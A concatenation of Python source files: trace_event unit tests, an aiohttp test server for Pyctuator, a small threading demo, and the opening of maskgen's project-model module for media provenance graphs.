with self._test_trace():
with self._test_trace():
pass
except log.TraceException:
return
assert False
def testDisable(self):
_old_multiprocessing_process = multiprocessing.Process
with self._test_trace(disable=False):
with open(self._log_path, 'r') as f:
self.assertTrue(trace_event.trace_is_enabled())
self.assertEqual(
multiprocessing.Process, multiprocessing_shim.ProcessShim)
trace_event.trace_disable()
self.assertEqual(
multiprocessing.Process, _old_multiprocessing_process)
self.assertEquals(len(json.loads(f.read() + ']')), 1)
self.assertFalse(trace_event.trace_is_enabled())
def testDoubleDisable(self):
with self._test_trace():
pass
trace_event.trace_disable()
def testFlushChanges(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.clock_sync('1')
self.assertEquals(len(json.loads(f.read() + ']')), 1)
f.seek(0)
trace_event.trace_flush()
self.assertEquals(len(json.loads(f.read() + ']')), 2)
def testFlushNoChanges(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
self.assertEquals(len(json.loads(f.read() + ']')),1)
f.seek(0)
trace_event.trace_flush()
self.assertEquals(len(json.loads(f.read() + ']')), 1)
def testDoubleFlush(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.clock_sync('1')
self.assertEquals(len(json.loads(f.read() + ']')), 1)
f.seek(0)
trace_event.trace_flush()
trace_event.trace_flush()
self.assertEquals(len(json.loads(f.read() + ']')), 2)
def testTraceBegin(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.trace_begin('test_event', this='that')
trace_event.trace_flush()
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 2)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue( current_entry['args']['argv'])
self.assertEquals( current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'test_event')
self.assertEquals(current_entry['args']['this'], '\'that\'')
self.assertEquals(current_entry['ph'], 'B')
def testTraceEnd(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.trace_end('test_event')
trace_event.trace_flush()
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 2)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'test_event')
self.assertEquals(current_entry['args'], {})
self.assertEquals(current_entry['ph'], 'E')
def testTrace(self):
with self._test_trace():
with trace_event.trace('test_event', this='that'):
pass
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 3)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'test_event')
self.assertEquals(current_entry['args']['this'], '\'that\'')
self.assertEquals(current_entry['ph'], 'B')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'test_event')
self.assertEquals(current_entry['args'], {})
self.assertEquals(current_entry['ph'], 'E')
def testTracedDecorator(self):
@trace_event.traced("this")
def test_decorator(this="that"):
pass
with self._test_trace():
test_decorator()
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 3)
expected_name = __name__ + '.test_decorator'
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], expected_name)
self.assertEquals(current_entry['args']['this'], '\'that\'')
self.assertEquals(current_entry['ph'], 'B')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], expected_name)
self.assertEquals(current_entry['args'], {})
self.assertEquals(current_entry['ph'], 'E')
def testClockSyncWithTs(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.clock_sync('id', issue_ts=trace_time.Now())
trace_event.trace_flush()
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 2)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'clock_sync')
self.assertTrue(current_entry['args']['issue_ts'])
self.assertEquals(current_entry['ph'], 'c')
def testClockSyncWithoutTs(self):
with self._test_trace():
with open(self._log_path, 'r') as f:
trace_event.clock_sync('id')
trace_event.trace_flush()
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 2)
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'process_argv')
self.assertEquals(current_entry['name'], 'process_argv')
self.assertTrue(current_entry['args']['argv'])
self.assertEquals(current_entry['ph'], 'M')
current_entry = log_output.pop(0)
self.assertEquals(current_entry['category'], 'python')
self.assertEquals(current_entry['name'], 'clock_sync')
self.assertFalse(current_entry['args'].get('issue_ts'))
self.assertEquals(current_entry['ph'], 'c')
def testTime(self):
actual_diff = []
def func1():
trace_begin("func1")
start = time.time()
time.sleep(0.25)
end = time.time()
actual_diff.append(end-start) # Pass via array because of Python scoping
trace_end("func1")
with self._test_trace():
start_ts = time.time()
trace_event.trace_begin('test')
end_ts = time.time()
trace_event.trace_end('test')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 3)
meta_data = log_output[0]
open_data = log_output[1]
close_data = log_output[2]
self.assertEquals(meta_data['category'], 'process_argv')
self.assertEquals(meta_data['name'], 'process_argv')
self.assertTrue(meta_data['args']['argv'])
self.assertEquals(meta_data['ph'], 'M')
self.assertEquals(open_data['category'], 'python')
self.assertEquals(open_data['name'], 'test')
self.assertEquals(open_data['ph'], 'B')
self.assertEquals(close_data['category'], 'python')
self.assertEquals(close_data['name'], 'test')
self.assertEquals(close_data['ph'], 'E')
event_time_diff = close_data['ts'] - open_data['ts']
recorded_time_diff = (end_ts - start_ts) * 1000000
self.assertLess(math.fabs(event_time_diff - recorded_time_diff), 1000)
def testNestedCalls(self):
with self._test_trace():
trace_event.trace_begin('one')
trace_event.trace_begin('two')
trace_event.trace_end('two')
trace_event.trace_end('one')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 5)
meta_data = log_output[0]
one_open = log_output[1]
two_open = log_output[2]
two_close = log_output[3]
one_close = log_output[4]
self.assertEquals(meta_data['category'], 'process_argv')
self.assertEquals(meta_data['name'], 'process_argv')
self.assertTrue(meta_data['args']['argv'])
self.assertEquals(meta_data['ph'], 'M')
self.assertEquals(one_open['category'], 'python')
self.assertEquals(one_open['name'], 'one')
self.assertEquals(one_open['ph'], 'B')
self.assertEquals(one_close['category'], 'python')
self.assertEquals(one_close['name'], 'one')
self.assertEquals(one_close['ph'], 'E')
self.assertEquals(two_open['category'], 'python')
self.assertEquals(two_open['name'], 'two')
self.assertEquals(two_open['ph'], 'B')
self.assertEquals(two_close['category'], 'python')
self.assertEquals(two_close['name'], 'two')
self.assertEquals(two_close['ph'], 'E')
self.assertLessEqual(one_open['ts'], two_open['ts'])
self.assertGreaterEqual(one_close['ts'], two_close['ts'])
def testInterleavedCalls(self):
with self._test_trace():
trace_event.trace_begin('one')
trace_event.trace_begin('two')
trace_event.trace_end('one')
trace_event.trace_end('two')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 5)
meta_data = log_output[0]
one_open = log_output[1]
two_open = log_output[2]
two_close = log_output[4]
one_close = log_output[3]
self.assertEquals(meta_data['category'], 'process_argv')
self.assertEquals(meta_data['name'], 'process_argv')
self.assertTrue(meta_data['args']['argv'])
self.assertEquals(meta_data['ph'], 'M')
self.assertEquals(one_open['category'], 'python')
self.assertEquals(one_open['name'], 'one')
self.assertEquals(one_open['ph'], 'B')
self.assertEquals(one_close['category'], 'python')
self.assertEquals(one_close['name'], 'one')
self.assertEquals(one_close['ph'], 'E')
self.assertEquals(two_open['category'], 'python')
self.assertEquals(two_open['name'], 'two')
self.assertEquals(two_open['ph'], 'B')
self.assertEquals(two_close['category'], 'python')
self.assertEquals(two_close['name'], 'two')
self.assertEquals(two_close['ph'], 'E')
self.assertLessEqual(one_open['ts'], two_open['ts'])
self.assertLessEqual(one_close['ts'], two_close['ts'])
# TODO(khokhlov): Fix this test on Windows. See crbug.com/945819 for details.
def disabled_testMultiprocess(self):
def child_function():
with trace_event.trace('child_event'):
pass
with self._test_trace():
trace_event.trace_begin('parent_event')
trace_event.trace_flush()
p = multiprocessing.Process(target=child_function)
p.start()
self.assertTrue(hasattr(p, "_shimmed_by_trace_event"))
p.join()
trace_event.trace_end('parent_event')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 5)
meta_data = log_output[0]
parent_open = log_output[1]
child_open = log_output[2]
child_close = log_output[3]
parent_close = log_output[4]
self.assertEquals(meta_data['category'], 'process_argv')
self.assertEquals(meta_data['name'], 'process_argv')
self.assertTrue(meta_data['args']['argv'])
self.assertEquals(meta_data['ph'], 'M')
self.assertEquals(parent_open['category'], 'python')
self.assertEquals(parent_open['name'], 'parent_event')
self.assertEquals(parent_open['ph'], 'B')
self.assertEquals(child_open['category'], 'python')
self.assertEquals(child_open['name'], 'child_event')
self.assertEquals(child_open['ph'], 'B')
self.assertEquals(child_close['category'], 'python')
self.assertEquals(child_close['name'], 'child_event')
self.assertEquals(child_close['ph'], 'E')
self.assertEquals(parent_close['category'], 'python')
self.assertEquals(parent_close['name'], 'parent_event')
self.assertEquals(parent_close['ph'], 'E')
@unittest.skipIf(sys.platform == 'win32', 'crbug.com/945819')
def testTracingControlDisabledInChildButNotInParent(self):
def child(resp):
# test tracing is not controllable in the child
resp.put(trace_event.is_tracing_controllable())
with self._test_trace():
q = multiprocessing.Queue()
p = multiprocessing.Process(target=child, args=[q])
p.start()
# test tracing is controllable in the parent
self.assertTrue(trace_event.is_tracing_controllable())
self.assertFalse(q.get())
p.join()
def testMultiprocessExceptionInChild(self):
def bad_child():
trace_event.trace_disable()
with self._test_trace():
p = multiprocessing.Pool(1)
trace_event.trace_begin('parent')
self.assertRaises(Exception, lambda: p.apply(bad_child, ()))
p.close()
p.terminate()
p.join()
trace_event.trace_end('parent')
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 3)
meta_data = log_output[0]
parent_open = log_output[1]
parent_close = log_output[2]
self.assertEquals(parent_open['category'], 'python')
self.assertEquals(parent_open['name'], 'parent')
self.assertEquals(parent_open['ph'], 'B')
self.assertEquals(parent_close['category'], 'python')
self.assertEquals(parent_close['name'], 'parent')
self.assertEquals(parent_close['ph'], 'E')
def testFormatJson(self):
with self._test_trace(format=trace_event.JSON):
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
log_output = json.loads(f.read() + ']')
self.assertEquals(len(log_output), 1)
self.assertEquals(log_output[0]['ph'], 'M')
def testFormatJsonWithMetadata(self):
with self._test_trace(format=trace_event.JSON_WITH_METADATA):
trace_event.trace_disable()
with open(self._log_path, 'r') as f:
log_output = json.load(f)
self.assertEquals(len(log_output), 2)
events = log_output['traceEvents']
self.assertEquals(len(events), 1)
self.assertEquals(events[0]['ph'], 'M')
def testFormatProtobuf(self):
with self._test_trace(format=trace_event.PROTOBUF):
trace_event.trace_flush()
with open(self._log_path, 'r') as f:
self.assertGreater(len(f.read()), 0)
def testAddMetadata(self):
with self._test_trace(format=trace_event.JSON_WITH_METADATA):
trace_event.trace_add_benchmark_metadata(
benchmark_start_time_us=1000,
story_run_time_us=2000,
benchmark_name='benchmark',
benchmark_description='desc',
story_name='story',
story_tags=['tag1', 'tag2'],
story_run_index=0,
)
trace_event.trace_disable()
with open(self._log_path, 'r') as f:
log_output = json.load(f)
self.assertEquals(len(log_output), 2)
telemetry_metadata = log_output['metadata']['telemetry']
self.assertEquals(len(telemetry_metadata), 7)
self.assertEquals(telemetry_metadata['benchmarkStart'], 1)
self.assertEquals(telemetry_metadata['traceStart'], 2)
self.assertEquals(telemetry_metadata['benchmarks'], ['benchmark'])
self.assertEquals(telemetry_metadata['benchmarkDescriptions'], ['desc'])
self.assertEquals(telemetry_metadata['stories'], ['story'])
self.assertEquals(telemetry_metadata['storyTags'], ['tag1', 'tag2'])
self.assertEquals(telemetry_metadata['storysetRepeats'], [0])
def testAddMetadataProtobuf(self):
with self._test_trace(format=trace_event.PROTOBUF):
trace_event.trace_add_benchmark_metadata(
benchmark_start_time_us=1000,
story_run_time_us=2000,
benchmark_name='benchmark',
benchmark_description='desc',
story_name='story',
story_tags=['tag1', 'tag2'],
story_run_index=0,
)
trace_event.trace_disable()
with open(self._log_path, 'r') as f:
self.assertGreater(len(f.read()), 0)
def testAddMetadataInJsonFormatRaises(self):
with self._test_trace(format=trace_event.JSON):
with self.assertRaises(log.TraceException):
trace_event.trace_add_benchmark_metadata(
benchmark_start_time_us=1000,
story_run_time_us=2000,
benchmark_name='benchmark',
benchmark_description='description',
story_name='story',
story_tags=['tag1', 'tag2'],
story_run_index=0,
)
def testSetClockSnapshotProtobuf(self):
trace_event.trace_set_clock_snapshot(
telemetry_ts=1234.5678,
boottime_ts=8765.4321,
)
with self._test_trace(format=trace_event.PROTOBUF):
trace_event.trace_disable()
with open(self._log_path, 'r') as f:
self.assertGreater(len(f.read()), 0)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.DEBUG)
unittest.main(verbosity=2)
|
aiohttp_test_server.py
|
import asyncio
import logging
import threading
import time
from aiohttp import web
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer
# mypy: ignore_errors
# pylint: disable=unused-variable
class AiohttpPyctuatorServer(PyctuatorServer):
def __init__(self) -> None:
self.app = web.Application()
self.routes = web.RouteTableDef()
self.pyctuator = Pyctuator(
self.app,
"AIOHTTP Pyctuator",
"http://localhost:8888",
"http://localhost:8888/pyctuator",
"http://localhost:8001/register",
registration_interval_sec=1,
metadata=self.metadata,
additional_app_info=self.additional_app_info,
)
@self.routes.get("/logfile_test_repeater")
async def logfile_test_repeater(request: web.Request) -> web.Response:
repeated_string = request.query.get("repeated_string")
logging.error(repeated_string)
return web.Response(text=repeated_string)
@self.routes.get("/httptrace_test_url")
async def get_httptrace_test_url(request: web.Request) -> web.Response:
# Sleep if requested to sleep - used for asserting httptraces timing
sleep_sec = request.query.get("sleep_sec")
if sleep_sec:
logging.info("Sleeping %s seconds before replying", sleep_sec)
time.sleep(int(sleep_sec))
# Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
headers = {
"resp-data": str(request.headers.get("User-Data")),
"response-secret": "my password"
}
return web.Response(headers=headers, body="my content")
self.app.add_routes(self.routes)
self.thread = threading.Thread(target=self._start_in_thread)
self.should_stop_server = False
self.server_started = False
async def _run_server(self) -> None:
logging.info("Preparing to start aiohttp server")
runner = web.AppRunner(self.app)
await runner.setup()
logging.info("Starting aiohttp server")
site = web.TCPSite(runner, port=8888)
await site.start()
self.server_started = True
logging.info("aiohttp server started")
while not self.should_stop_server:
await asyncio.sleep(1)
logging.info("Shutting down aiohttp server")
await runner.shutdown()
await runner.cleanup()
logging.info("aiohttp server is shutdown")
def _start_in_thread(self) -> None:
loop = asyncio.new_event_loop()
loop.run_until_complete(self._run_server())
loop.stop()
def start(self) -> None:
self.thread.start()
while not self.server_started:
time.sleep(0.01)
def stop(self) -> None:
logging.info("Stopping aiohttp server")
self.pyctuator.stop()
self.should_stop_server = True
self.thread.join()
logging.info("aiohttp server stopped")
def atexit(self) -> None:
if self.pyctuator.boot_admin_registration_handler:
self.pyctuator.boot_admin_registration_handler.deregister_from_admin_server()
|
thread.py
|
# thread
import time, threading
def loop():
print('thread %s is running...' % threading.current_thread().name)
n = 0
while n < 5:
n = n + 1
print('thread %s >>> %s' % (threading.current_thread().name, n))
time.sleep(1)
print('thread %s ended.' % threading.current_thread().name)
print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print('thread %s ended.' % threading.current_thread().name)
|
scenario_model.py
|
# =============================================================================
# Authors: PAR Government
# Organization: DARPA
#
# Copyright (c) 2016 PAR Government
# All rights reserved.
# ==============================================================================
import collections
import copy
import shutil
import tempfile
import traceback
from threading import Lock
import ffmpeg_api
import graph_rules
import mask_rules
import notifiers
import plugins
import video_tools
from graph_auto_updates import updateJournal
from group_filter import buildFilterOperation, GroupFilter, GroupOperationsLoader
from image_graph import createGraph
from image_wrap import ImageWrapper
from maskgen.image_graph import ImageGraph
from maskgen.video_tools import DummyMemory
from support import MaskgenThreadPool, StatusTracker, getPathValuesFunc, getPathValues
from software_loader import Software, getProjectProperties, getRule, getOperation
from tool_set import *
from validation.core import Validator, ValidationMessage,Severity,removeErrorMessages
def formatStat(val):
if type(val) == float:
return "{:5.3f}".format(val)
return str(val)
prefLoader = MaskGenLoader()
def defaultNotify(edge, message, **kwargs):
return True
def loadProject(projectFileName, notify=None, username=None, tool=None):
"""
Given JSON file name, open then the appropriate type of project
@rtype: ImageProjectModel
"""
graph = createGraph(projectFileName, tool=tool)
return ImageProjectModel(projectFileName, graph=graph, notify=notify, username=username, tool=tool)
def consolidate(dict1, dict2):
"""
:param dict1:
:param dict2:
:return:
@rtype dict
"""
d = dict(dict1)
d.update(dict2)
return d
EdgeTuple = collections.namedtuple('EdgeTuple', ['start', 'end', 'edge'])
def createProject(path,
notify=None,
base=None,
name=None,
suffixes=[],
tool=None,
username=None,
organization=None,
preferences={}):
"""
This utility function creates a ProjectModel given a directory.
If the directory contains a JSON file, then that file is used as the project file.
Otherwise, the directory is inspected for images.
All images found in the directory are imported into the project.
If the 'base' parameter is provided, the project is named based on that image name.
If the 'base' parameter is not provided, the project name is set based on finding the
first image in the list of found images, sorted in lexicographic order, starting with JPG, then PNG and then TIFF.
:param path: directory name or JSON file
:param notify: function pointer receiving the image (node) id and the event type
:param base: image name
:param suffixes:
:param projectModelFactory:
:param organization:
:return: a tuple=> a project if found or created, returns True if created. Returns None if a project cannot be found or created.
@type path: str
@type notify: (str, str) -> None
@rtype: (ImageProjectModel, bool)
"""
if path is None:
path = '.'
selectionSet = [filename for filename in os.listdir(path) if filename.endswith(".json") and \
filename not in ['operations.json','project_properties.json']]
if len(selectionSet) == 0:
return ImageProjectModel(os.path.join('.', 'Untitled.json'), notify=notify, username=username, tool=tool), True
else:
if (path.endswith(".json")) and os.path.exists(path):
return ImageProjectModel(os.path.abspath(path), notify=notify, username=username, tool=tool), False
# just a directory
selectionSet = [filename for filename in os.listdir(path) if filename.endswith(".json")]
if len(selectionSet) != 0 and base is not None:
logging.getLogger('maskgen').warning('Cannot add base image/video to an existing project')
return None
# JSON file not found and base image not provided
if len(selectionSet) == 0 and base is None:
logging.getLogger('maskgen').info(
'No project found and base image/video not provided; Searching for a base image/video')
suffixPos = 0
# look for a viable media file to create the project
while len(selectionSet) == 0 and suffixPos < len(suffixes):
suffix = suffixes[suffixPos]
selectionSet = [filename for filename in os.listdir(path) if filename.lower().endswith(suffix)]
selectionSet.sort()
suffixPos += 1
if len(selectionSet) == 0:
logging.getLogger('maskgen').warning('Could not find a base image/video')
return None
projectFile = selectionSet[0]
# add base is not None
elif len(selectionSet) == 0:
projectFile = os.path.split(base)[1]
else:
projectFile = selectionSet[0]
projectFile = os.path.abspath(os.path.join(path, projectFile))
if not os.path.exists(projectFile):
logging.getLogger('maskgen').warning('Base project file ' + projectFile + ' not found')
return None
image = None
existingProject = projectFile.endswith(".json")
if not existingProject:
image = projectFile
if name is None:
projectFile = os.path.splitext(projectFile)[0] + ".json"
else:
projectFile = os.path.abspath(os.path.join(path, name + ".json"))
model = ImageProjectModel(projectFile, notify=notify, baseImageFileName=image, username=username, tool=tool)
if organization is not None:
model.setProjectData('organization', organization)
if image is not None:
model.addImagesFromDir(path, baseImageFileName=os.path.split(image)[1], suffixes=suffixes, \
sortalg=lambda f: os.stat(os.path.join(path, f)).st_mtime, preferences=preferences)
return model, not existingProject
class MetaDiff:
diffData = None
def __init__(self, diffData):
self.diffData = diffData
def getMetaType(self):
return 'EXIF'
def getSections(self):
return None
def getColumnNames(self, section):
return ['Operation', 'Old', 'New']
def toColumns(self, section):
d = {}
for k, v in self.diffData.iteritems():
old = v[1] if v[0].lower() == 'change' or v[0].lower() == 'delete' else ''
new = v[2] if v[0].lower() == 'change' else (v[1] if v[0].lower() == 'add' else '')
old = old.encode('ascii', 'xmlcharrefreplace')
new = new.encode('ascii', 'xmlcharrefreplace')
d[k] = {'Operation': v[0], 'Old': old, 'New': new}
return d
class VideoMetaDiff:
"""
Video Meta-data changes are represented by section.
A special section called Global represents meta-data for the entire video.
Other sections are in the individual streams (e.g. video and audio) of frames.
A table of columns is produced per section. The columns are Id, Operation, Old and New.
Operations are add, delete and change.
For streams, each row is identified by a time and meta-data name.
When frames are added, the New column contains the number of frames added followed by the end time in seconds: 30:=434.4343434
When frames are deleted, the Old column contains the number of frames removed followed by the end time in seconds: 30:=434.4343434
"""
diffData = None
def __init__(self, diffData):
self.diffData = diffData
def getMetaType(self):
return 'FRAME'
def getSections(self):
return self.diffData.keys()
def getColumnNames(self, section):
return ['Operation', 'Old', 'New']
def toColumns(self, section):
d = {}
if len(self.diffData) == 0:
return d
if section is None:
section = self.diffData.keys()[0]
self._sectionChanges(d, self.diffData[section])
return d
def _sectionChanges(self, d, sectionData, prefix=''):
for k, v in sectionData.iteritems():
dictKey = str(k)
old = v[1] if v[0].lower() == 'change' or v[0].lower() == 'delete' else ''
new = v[2] if v[0].lower() == 'change' else (v[1] if v[0].lower() == 'add' else '')
if type(old) is not str:
old = str(old)
if type(new) is not str:
new = str(new)
old = old.encode('ascii', 'xmlcharrefreplace')
new = new.encode('ascii', 'xmlcharrefreplace')
d[dictKey] = {'Operation': v[0], 'Old': old, 'New': new}
class Modification:
"""
Represents a single manipulation to a source node, resulting in the target node
"""
operationName = None
additionalInfo = ''
# for backward compatibility and ease of access, input mask name is both arguments and
# an instance variable
inputMaskName = None
# set of masks used for videos
maskSet = None
# Record the link in the composite. Uses 'no' and 'yes' to mirror JSON read-ability
recordMaskInComposite = 'no'
# arguments used by the operation
arguments = dict()
# instance of Software
software = None
# automated
automated = 'no'
# errors
errors = list()
# generate mask
generateMask = "all"
username = ''
ctime = ''
start = ''
end = ''
semanticGroups = None
def __init__(self, operationName, additionalInfo,
start='',
end='',
arguments={},
recordMaskInComposite=None,
changeMaskName=None,
inputMaskName=None,
software=None,
maskSet=None,
automated=None,
username=None,
ctime=None,
errors=list(),
semanticGroups=None,
category=None,
generateMask="all"):
self.start = start
self.end = end
self.additionalInfo = additionalInfo
self.maskSet = maskSet
self.automated = automated if automated else 'no'
self.errors = errors if errors else list()
self.operationName = operationName
self.setArguments(arguments)
self.semanticGroups = semanticGroups
if inputMaskName is not None:
self.setInputMaskName(inputMaskName)
self.changeMaskName = changeMaskName
self.username = username if username is not None else ''
self.ctime = ctime if ctime is not None else datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')
self.software = software
if recordMaskInComposite is not None:
self.recordMaskInComposite = recordMaskInComposite
self.category = category
self.generateMask = generateMask
def getSemanticGroups(self):
return [] if self.semanticGroups is None else self.semanticGroups
def setSemanticGroups(self, groups):
self.semanticGroups = groups
def setErrors(self, val):
self.errors = val if val else list()
def setAutomated(self, val):
self.automated = 'yes' if val == 'yes' else 'no'
def setMaskSet(self, maskset):
self.maskSet = maskset
def getSoftwareName(self):
return self.software.name if self.software is not None and self.software.name is not None else ''
def getSoftwareVersion(self):
return self.software.version if self.software is not None and self.software.version is not None else ''
def setSoftware(self, software):
self.software = software
def setArguments(self, args):
self.arguments = dict()
for k, v in args.iteritems():
self.arguments[k] = v
if k == 'inputmaskname':
self.setInputMaskName(v)
def setInputMaskName(self, inputMaskName):
self.inputMaskName = inputMaskName
if 'inputmaskname' not in self.arguments or self.arguments['inputmaskname'] != inputMaskName:
self.arguments['inputmaskname'] = inputMaskName
def setAdditionalInfo(self, info):
self.additionalInfo = info
def setRecordMaskInComposite(self, recordMaskInComposite):
self.recordMaskInComposite = recordMaskInComposite
def setOperationName(self, name):
self.operationName = name
def setFromOperation(self,op,filetype='image'):
"""
:param op:
:return:
@type op: Operation
"""
self.category = op.category
self.generateMask = op.generateMask
self.recordMaskInComposite = op.recordMaskInComposite(filetype)
class LinkTool:
"""
LinkTools are used to handle the comparison and analysis of each each in the graph.
The link tools are organizaed by transitions of
media type: video->image, video->video, audio->video, etc.
"""
def __init__(self):
return
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.donothing_processor"
def processDonors(self, scModel, start, destination, startIm, startFileName, destIm, destFileName, arguments, invert=False):
"""
:param scModel:
:param destination:
:param startIm:
:param startFileName:
:param destIm:
:param arguments:
:param invert:
:return:
@type scModel: ImageProjectModel
"""
result = scModel.getCreatingOperation(destination)
if result is not None:
return result[1].getDonorProcessor(default_processor=self.getDefaultDonorProcessor())(
scModel.getGraph(),
start,
destination,
result[0],
(startIm, startFileName),
(destIm, destFileName)).create(arguments=arguments,
invert=invert)
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
return None, {}, []
def _addAnalysis(self, startIm, destIm, op, analysis, mask, linktype=None,
arguments={}, start=None, end=None, scModel=None):
"""
Add analysis to dictionary
:param startIm:
:param destIm:
:param op:
:param analysis: fill this dictionary
:param mask:
:param linktype:
:param arguments:
:param start:
:param end:
:param scModel:
:return:
@type scModel: ImageProjectModel
"""
import importlib
directory = scModel.get_dir()
opData = scModel.gopLoader.getOperationWithGroups(op)
if opData is None:
return
arguments = dict(arguments)
arguments['start_node'] = start
arguments['end_node'] = end
arguments['sc_model'] = scModel
for analysisOp in opData.analysisOperations:
mod_name, func_name = analysisOp.rsplit('.', 1)
try:
mod = importlib.import_module(mod_name)
func = getattr(mod, func_name)
func(analysis, startIm, destIm, mask=invertMask(mask), linktype=linktype,
arguments=arguments,
directory=directory)
except Exception as e:
logging.getLogger('maskgen').error('Failed to run analysis {}: {} '.format(analysisOp, str(e)))
def addSubstituteMasks(self, start, destination, scModel, op, arguments={}, filename=''):
return None
class ImageImageLinkTool(LinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
LinkTool.__init__(self)
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask and the analysis results (a dictionary)
"""
im1 = scModel.getImage(start)
im2 = scModel.getImage(end)
edge = scModel.G.get_edge(start, end)
compareFunction = None
if edge is not None:
operation = scModel.gopLoader.getOperationWithGroups(edge['op'] if edge is not None else 'NA', fake=True)
compareFunction = operation.getCompareFunction()
mask, analysis, error = createMask(im1, im2, invert=False, arguments=arguments,
alternativeFunction=compareFunction)
if error is not None:
logging.getLogger('maskgen').warn('Failed mask generation for operation {} between {} and {}'.format(
edge['op'] if edge is not None else 'NA',
start,
end
))
return im1, im2, mask, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
@type scModel: ImageProjectModel
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
errors = list()
operation = scModel.gopLoader.getOperationWithGroups(op)
if op == 'Donor':
predecessors = scModel.G.predecessors(destination)
mask = None
expect_donor_mask = False
analysis = {}
if not skipDonorAnalysis:
errors = list()
mask = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
if mask is None:
mask = convertToMask(startIm).invert()
if expect_donor_mask:
errors = ["Donor image has insufficient features for SIFT and does not have a predecessor node."]
analysis = {}
else:
mask = startIm.apply_alpha_to_mask(mask)
else:
logging.getLogger('maskgen').debug('Create Mask')
mask, analysis, error = createMask(startIm,
destIm,
invert=invert,
arguments=arguments,
alternativeFunction=operation.getCompareFunction(),
convertFunction=operation.getConvertFunction())
if error is not None:
errors.append(error)
logging.getLogger('maskgen').warn('Failed mask generation for operation {} between {} and {}'.format(
op,
start,
destination
))
logging.getLogger('maskgen').debug('EXIF Compare')
exifDiff = exif.compareexif(startFileName, destFileName)
analysis = analysis if analysis is not None else {}
analysis['exifdiff'] = exifDiff
logging.getLogger('maskgen').debug('Analysis')
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='image.image',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class VideoImageLinkTool(ImageImageLinkTool):
"""
Supports mask construction and meta-data comparison when linking video to image.
"""
def __init__(self):
ImageImageLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.video_without_audio_donor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask and the analysis results (a dictionary)
"""
